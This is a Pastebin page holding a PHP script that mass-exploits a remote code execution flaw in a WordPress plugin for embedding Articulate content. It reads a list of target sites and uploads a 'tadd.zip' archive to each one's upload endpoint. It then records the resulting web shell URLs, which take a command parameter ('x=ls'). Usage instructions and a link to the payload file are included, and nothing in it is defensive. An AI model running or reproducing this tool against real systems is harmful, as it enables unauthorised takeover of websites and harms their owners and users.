Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- # Coded by UstadCage_48
- # WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution (Unautorized)
- # https://www.exploitkita.org/2019/06/wordpress-plugin-insert-or-embed.html?m=1
- # Exploit-Kita.org
- # Author : Rinto (con7ext)
- # Usage : php tools.php list.txt
- # File : https://drive.google.com/file/d/1-5Dbrb4QG_wUTq5e7FsWWXQMLjlbehL0/view?usp=drivesdk
- # Don't Change Name File tadd.zip !
- error_reporting(0);
- function sv($site,$ext){
- $fp = fopen("$ext.txt", 'a');
- fwrite($fp, "$site\n");
- fclose($fp);
- }
- $kuning = "\033[93m";
- $ungu = "\033[95m";
- $biru = "\033[94m";
- $merah = "\033[91m";
- $hijau = "\033[92m";
- $tad = explode("\n",file_get_contents($argv[1]));
- foreach($tad as $lusi){
- // coba
- $up = shell_exec('curl -s -F "name=tadd.zip" -F "chunk=2" -F "chunks=3" -F "file=@tadd.zip" '.$lusi.'/index.php/wp-json/articulate/v1/upload-data');
- preg_match('/"path" : "(.*?)",/',$up,$path);
- if(preg_match('/Upload Complete/',$up)){
- $parse = parse_url($lusi.$path[1]);
- $pattern = '~\w+\.html~';
- $parse = preg_replace($pattern, '', $parse);
- $site = $parse['scheme'].'://'.$parse['host'].$parse['path'];
- $str = str_replace("\/","/",$site);
- echo "$ungu [$] $hijau Target : $kuning ".$lusi."\n";
- echo "$ungu [$] $hijau Shellx : $ungu : $hijau ".$str."index.php?x=ls\n\n";
- sv($str."index.php?x=ls","wp");
- } else {
- echo "$ungu [$] $kuning $lusi$ungu : $merah No Vulnerable \n\n";
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement